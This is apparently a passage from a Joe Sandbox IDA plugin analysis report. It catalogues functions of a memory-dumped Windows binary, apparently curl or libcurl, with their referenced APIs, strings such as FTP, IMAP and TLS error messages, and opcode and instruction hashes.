Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: freemalloc
String ID: Excessive server response line length received, %zd bytes. Stripping$response reading failed
API String ID: 3061335427-128329444
Opcode ID: 4bc1a3ba90e7650c2e1ab9f6cb697c01b491abeb558399c9548ca29450d0e082
Instruction ID: d80256851c352984df0888cca8f014a8dfb154e4b5374eefd940af9d4a94b0e9
Opcode Fuzzy Hash: 4bc1a3ba90e7650c2e1ab9f6cb697c01b491abeb558399c9548ca29450d0e082
Instruction Fuzzy Hash: 7191D22260DB8582EB19AB16E5447AEE360FF49B90F884075DEAD07BC4DF3CD458D394

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D47504 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF7F8D4296C), ref: 00007FF7F8D47580
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF7F8D4296C), ref: 00007FF7F8D476F5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF7F8D4296C), ref: 00007FF7F8D477CD

Strings

%s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x, xrefs: 00007FF7F8D47749

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
String ID: %s %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x
API String ID: 2190258309-3654824481
Opcode ID: fd88724f91d92cee37a979787776ce6bb5320076e8e4ccdb819f17ee8a2d188f
Instruction ID: 29972e050164f2517ff38598f5f0addaf7a7148728603c1e080a88a5ba6552b8
Opcode Fuzzy Hash: fd88724f91d92cee37a979787776ce6bb5320076e8e4ccdb819f17ee8a2d188f
Instruction Fuzzy Hash: D9919F22B086859AEB10AF26E4502ADFB61FB4D784F884071DFAD17B95CF3CD1189764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D06A1C Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D06B04

Strings

option %s: %s, xrefs: 00007FF7F8D06C34
--url, xrefs: 00007FF7F8D06BD7
%s, xrefs: 00007FF7F8D06C4C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: malloc
String ID: %s$--url$option %s: %s
API String ID: 2803490479-3421415073
Opcode ID: 7186fe7eb08453efbda96950140b5d89ad613572c0bb782e370295c8b953767e
Instruction ID: bda90bf929c5181515fd9eef1d56a9423a2cf6471a13018ef4d69f44a5ff2197
Opcode Fuzzy Hash: 7186fe7eb08453efbda96950140b5d89ad613572c0bb782e370295c8b953767e
Instruction Fuzzy Hash: 7F61F462A0C7C282E761AB15A4502BAFBA4FF48754F848035DABD437C9DF3CE449D768

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D227D0 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F8D227FC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D22907
qsort.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF7F8D22963
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D229A4

Part of subcall function 00007FF7F8D2168C: _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000001,00007FF7F8D22B1A,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D216A5

Part of subcall function 00007FF7F8D21700: inet_pton.WS2_32 ref: 00007FF7F8D21725
Part of subcall function 00007FF7F8D21700: inet_pton.WS2_32 ref: 00007FF7F8D2173A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _time64inet_pton$freemallocqsort
String ID:
API String ID: 1958717517-0
Opcode ID: 51352d9ffd6e313afe23b07970a0e9d4b67595476362b460e40858083a4cbb13
Instruction ID: 79656d536d2657f7913ace6b3fba47c4b37fadec231a2e8e42cfff567b900342
Opcode Fuzzy Hash: 51352d9ffd6e313afe23b07970a0e9d4b67595476362b460e40858083a4cbb13
Instruction Fuzzy Hash: B5519321B0964241FF1AAF22A510379E2A0BF5DFD4F8C4031EE6D477D5DE3CE449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2FEE4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2FF4A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D300C4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D300E2

Strings

Failed to alloc scratch buffer!, xrefs: 00007FF7F8D2FF5C

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
String ID: Failed to alloc scratch buffer!
API String ID: 2190258309-1446904845
Opcode ID: a59c3e0831f807650454327b5fc6bb44cde1d181724f50777204d164c057ca1a
Instruction ID: 2cbbb0283ac3634132d4c1e53b9047c1c28e4a5f2e42318b2d10ad1d4f3ce2ab
Opcode Fuzzy Hash: a59c3e0831f807650454327b5fc6bb44cde1d181724f50777204d164c057ca1a
Instruction Fuzzy Hash: F151A322A09B8596EB10EF25E8047A9E7A0FF0D784F980035DB6D07795DF3CE458E398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2F9A0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2FAB8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2FB3E

Strings

., xrefs: 00007FF7F8D2FA42

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: .
API String ID: 1294909896-916926321
Opcode ID: 7e67a81e3a080e7d61ae5db57032cacf38bc9c7963bc5e3a0a4640a0d5f47535
Instruction ID: ce1f3c5989a031f097f57b03cd7d5d6af047f203e18884b132287b005aa938da
Opcode Fuzzy Hash: 7e67a81e3a080e7d61ae5db57032cacf38bc9c7963bc5e3a0a4640a0d5f47535
Instruction Fuzzy Hash: 1C518F22A0CB86C2FB60AB11E850279E394FF4CB84F890571DA6D47790DF3CE4599798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D16554 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F8D1659F
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F8D165B3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1661D
_mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F8D16634

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _mbschr$_mbsnbcpymalloc
String ID:
API String ID: 2972395503-0
Opcode ID: b5697336e5453d5cea1e72d8a035da63a2a18224391c6ef73613a7a6344ec312
Instruction ID: 7435c7edaec186555942c02bd11e2d8b7525515f5a16259880bc6fecbc21c940
Opcode Fuzzy Hash: b5697336e5453d5cea1e72d8a035da63a2a18224391c6ef73613a7a6344ec312
Instruction Fuzzy Hash: 95318921A09B4685FB14EF62B804668F6A4EF4CBE0F890175CE2D0B7D4DF3CE0099798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2AA64 Relevance: 6.1, APIs: 4, Instructions: 66stringCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2AAA2
strchr.LIBVCRUNTIME ref: 00007FF7F8D2AABD
strchr.LIBVCRUNTIME ref: 00007FF7F8D2AAD0
strchr.LIBVCRUNTIME ref: 00007FF7F8D2AAE2

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: strchr$isspace
String ID:
API String ID: 556700956-0
Opcode ID: e218c78b4ade7d3e38b077298e820fef08f04d7e18605d4b4e242df09a1c673f
Instruction ID: 5bdd4d0a88ae637a9a33619a6a82b161b09c5d611b2fcecb052122ea7e0f27b8
Opcode Fuzzy Hash: e218c78b4ade7d3e38b077298e820fef08f04d7e18605d4b4e242df09a1c673f
Instruction Fuzzy Hash: 8811C010A0C68345FB187B2366012B9D682DF59BE4F9C1270DE7E077C6ED2CE44A67A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2EB90 Relevance: 6.1, APIs: 4, Instructions: 61stringCOMMON

Download Yara Rule

APIs

isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2EBC1
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2EBCF
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D2EBDD
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D2EC20

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isdigit$strtol
String ID:
API String ID: 2442889181-0
Opcode ID: a67479961114326f8f07f49f5f6c507bd501bcddc971d7c6c9d343f05df2e53d
Instruction ID: 292540fa6f914e5bd214cacc3e812e6d631f643afb0a0dda470404e5c1840285
Opcode Fuzzy Hash: a67479961114326f8f07f49f5f6c507bd501bcddc971d7c6c9d343f05df2e53d
Instruction Fuzzy Hash: 5B21F971A0829685E7647F96D440278F7A0EF59B40FCC4035CAA9872D6CE3DE889F768

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3BCD0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Cannot APPEND with unknown input file size, xrefs: 00007FF7F8D3BD17
APPEND %s (\Seen) {%I64d}, xrefs: 00007FF7F8D3BD44
Cannot APPEND without a mailbox., xrefs: 00007FF7F8D3BCFA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: APPEND %s (\Seen) {%I64d}$Cannot APPEND with unknown input file size$Cannot APPEND without a mailbox.
API String ID: 0-1307079265
Opcode ID: 48b4bca2344cb32ef9d8dc8a52a7f623c44d8e344f128a619064515f7ca615b4
Instruction ID: fd9d75625dc983adb61471dc3ec58b346bf6dbf0f42599cd7a5e20911807d17b
Opcode Fuzzy Hash: 48b4bca2344cb32ef9d8dc8a52a7f623c44d8e344f128a619064515f7ca615b4
Instruction Fuzzy Hash: A2115161609B8681EB10FB15F4502A9E360EF48BC4F984032DA5D4B7D5DF3CD549E798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2E2D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D2E436
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D2E46C

Strings

%lx, xrefs: 00007FF7F8D2E427

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_l_errno
String ID: %lx
API String ID: 1766030736-1448181948
Opcode ID: 89a99244bc9a4288bd00a8608990d59dd2fc616ea3720318d1d8e3a0d7ffb7ef
Instruction ID: 6a0f9edf879bce899f44508baf6f12ffcf85294afc569d816cd7402a296d30a3
Opcode Fuzzy Hash: 89a99244bc9a4288bd00a8608990d59dd2fc616ea3720318d1d8e3a0d7ffb7ef
Instruction Fuzzy Hash: 01515C32A0855641FB25AB25D4007BDE380FF8C765F944339D97E036C2DE3CE84EA2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3ECB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

SSL/TLS connection timeout, xrefs: 00007FF7F8D3ED20
select/poll on SSL/TLS socket, errno: %d, xrefs: 00007FF7F8D3EE00

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
API String ID: 0-3791222319
Opcode ID: f2873cb2e19afa8bbf216741164c1f1409d1d3743b49ef48fc39db06636968f5
Instruction ID: 63d05331c844c92208e19242cae3e08f551ab09a62c8b176d4d90d656a0db1fb
Opcode Fuzzy Hash: f2873cb2e19afa8bbf216741164c1f1409d1d3743b49ef48fc39db06636968f5
Instruction Fuzzy Hash: D441E822B0864282FB54EB12E9445BDE251BF88794FD44235CE2907BE5DF3DE449F368

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D332F8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D3344C

Strings

STLS not supported., xrefs: 00007FF7F8D33467
STLS, xrefs: 00007FF7F8D3343B

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: STLS$STLS not supported.
API String ID: 2941638530-4285220660
Opcode ID: 599e0e59caa209ba69c9f64e9ba40a5d93f129b01fea4d314cb495e678d3e004
Instruction ID: 48fbcd81f47996acd90a7423ef9d3154dac86cf6f966fcc32c53d2a2ca2cc67d
Opcode Fuzzy Hash: 599e0e59caa209ba69c9f64e9ba40a5d93f129b01fea4d314cb495e678d3e004
Instruction Fuzzy Hash: 2541F831E0C6824AF769EB10F64427DE691AF08794F944135CA7D4A1C5DF3DE449B3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D34618 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF7F8D34714

Strings

FTP response timeout, xrefs: 00007FF7F8D34733
FTP response aborted due to select/poll error: %d, xrefs: 00007FF7F8D3471A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast
String ID: FTP response aborted due to select/poll error: %d$FTP response timeout
API String ID: 1452528299-4057338436
Opcode ID: f7fb3e20a6b877405420897af26970cb6e743fc198844eb5bc6cb4d18cc6fb41
Instruction ID: ee55514ab65f20eff4f682e77ec598abd1ce82004929e2770ac5d0d2ce64d3f2
Opcode Fuzzy Hash: f7fb3e20a6b877405420897af26970cb6e743fc198844eb5bc6cb4d18cc6fb41
Instruction Fuzzy Hash: A831B061A0964681FB21BF22D5002B9E292BF5DB94F840131DE2C866D1DF3CE159F6E8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3ACD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D10364: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D103B1

_open.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D3AD7F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D3ADDB

Strings

Couldn't open file %s, xrefs: 00007FF7F8D3ADA4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _openfreemalloc
String ID: Couldn't open file %s
API String ID: 2329864384-447283422
Opcode ID: 314835c017acaab7b8f9e13be0dd3e2b1523af4054d113b6c0ca58d6ef6f5c07
Instruction ID: 3484ab44166df219b6edfe340ddc3e23a7bf81f3ebd4dc6e1e6580bda826386e
Opcode Fuzzy Hash: 314835c017acaab7b8f9e13be0dd3e2b1523af4054d113b6c0ca58d6ef6f5c07
Instruction Fuzzy Hash: 5731C252B0CA8285FB28EB25E8056B9E750AF09785F888031DE6D477D1EE3CE849A754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1024C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D1029E
__swprintf_l.LIBCMT ref: 00007FF7F8D1031E

Strings

%%%02X, xrefs: 00007FF7F8D10312

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __swprintf_lmalloc
String ID: %%%02X
API String ID: 1671605834-3569721977
Opcode ID: 66fbbc3deb7bb64663e698fd2845cedef9887adf36b5293bcb2b65144f5427f8
Instruction ID: 401777a897ddeb0976a5ea4edfe4e06e21f8d7d1fc7d4490937fe4f1c7fb80c5
Opcode Fuzzy Hash: 66fbbc3deb7bb64663e698fd2845cedef9887adf36b5293bcb2b65144f5427f8
Instruction Fuzzy Hash: 1B31C762B09A8282FF54BB26944016CE690AF5CFA0FD84535CA7D077C4DE3CE80AD368

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2CB94 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2CC2C

Strings

Failed to alloc memory for big header!, xrefs: 00007FF7F8D2CC33
Avoided giant realloc for header (max is %d)!, xrefs: 00007FF7F8D2CBE1

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: realloc
String ID: Avoided giant realloc for header (max is %d)!$Failed to alloc memory for big header!
API String ID: 471065373-933084494
Opcode ID: 29aa0743b1533901b8be04917cafcd5fc311887c00c6ec4c15920c7bfddd4422
Instruction ID: 63247a0ecb169b0b6a3cc12461412948d6554dcdb4388a243f0696ed2759dc5e
Opcode Fuzzy Hash: 29aa0743b1533901b8be04917cafcd5fc311887c00c6ec4c15920c7bfddd4422
Instruction Fuzzy Hash: B9214D22B14E8186DB24EF26A840269F7A0FF49BC4F544431DE9E47FA5DE3CE446E358

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3B4C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B4FD
isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D3B512

Strings

, xrefs: 00007FF7F8D3B521

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isdigit
String ID:
API String ID: 2326231117-3916222277
